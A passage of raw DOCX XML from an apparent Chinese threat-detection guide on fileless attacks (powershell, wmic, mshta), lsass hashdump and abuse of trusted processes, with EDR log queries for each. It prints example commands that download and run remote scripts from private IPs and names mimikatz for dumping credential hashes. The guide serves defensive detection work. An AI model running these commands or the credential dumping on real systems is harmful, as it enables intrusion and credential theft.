          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe -nop -c "IEX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>((new-object net.webclient).dowanloaddstring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>://10.43.191.14:80/a'))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>存在告警</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="15030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400040" cy="1503045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="25628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400040" cy="2562860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程名I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息等条件，进一步检索恶意进程的行为，如</w:t>
      </w:r>
      <w:r>
        <w:t>process_name:"powershell.exe" AND sip:10.95.13.12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。配合“统计”功能，可以快速查找更多有用信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="23920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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2392045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无文件攻击_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>wmic检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Wmic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以从网络下载脚本并执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Wmic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数带有明显的关键字。如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wmic os </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>get /FORMAT</w:t>
      </w:r>
      <w:r>
        <w:t>:"http://192.168.1.107:9996/g8gkv.xsl"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>存在告警</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="18846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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1884680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="26035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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2603500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过检索条件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>process_name:"wmic.exe" AND cmdline:"format"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2595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5400040" cy="2595880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无文件攻击_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mshta检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以从网络下载执行hta脚本并执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>参数会带有特定的参数关键字。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>mshta.exe http:</w:t>
      </w:r>
      <w:r>
        <w:t>//192.168.1.109:8080/pKz4Kk059Nq9.hta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>存在告警</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1814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5400040" cy="1814195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="24580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400040" cy="2458085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据进程名检索：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>process_name:"mshta.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，进行分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="26663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400040" cy="2666365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashdump攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t> lsass.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>进程内存中包含了用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>密码的hash信息。黑客会dump并解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>lsas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>exe内存，获取账户密码的hash信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接利用mimikazt工具获取hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先dump出lsass</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe内存，再进行解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>存在告警</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="14319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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1431925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2438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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2438400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据进程名或参数进行检索：</w:t>
      </w:r>
      <w:r>
        <w:t>cmdline:"accepteula" AND cmdline:"lsass.exe"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="281686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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2816860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用白进程攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑客常常利用系统进程或者利用常用软件漏洞来进行恶意攻击，如利用</w:t>
      </w:r>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffice、</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dobe等漏洞执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
